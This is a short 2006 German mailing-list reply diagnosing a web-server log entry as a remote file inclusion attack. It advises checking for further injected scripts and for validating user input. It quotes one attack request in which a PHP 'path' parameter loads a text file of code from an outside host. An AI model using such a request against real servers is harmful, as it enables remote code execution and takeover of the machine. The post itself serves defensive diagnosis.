[Postfixbuch-users] cleanup schreibt einfach um

Jan Scholten Jammer at gmx.de
Fr Okt 6 15:47:44 CEST 2006


Guten Tag Jim Knuth

Am Freitag, 6. Oktober 2006 um 15:38 schrieben Sie:

> blank.php?path=http://www.kairosperu.org/language/blog.txt

Sieht nach klassischen remote inclusion aus.. Hoffentlich hat er zusätzlich noch nette andere Sachen
ausgeführt.. z.B. mit rechten des Webservers Software installiert.. und sich dann über nen local
rootexploit zum Meister der Maschine aufgeschwungen..

such mal ob da nicht noch andere Scripte eingebunden wurden..

Generell gilt: wer Usereingaben nicht überprüft möge mit harten Schlägen auf sämtliche Extremitäten
bestraft werden.. mehrfach!


Jan


-- 
Resistance is Futile, You Will be Distributed

Mit freundlichen Grüßen
Jan Scholten
mailto:Jammer at gmx.de







Mehr Informationen über die Mailingliste Postfixbuch-users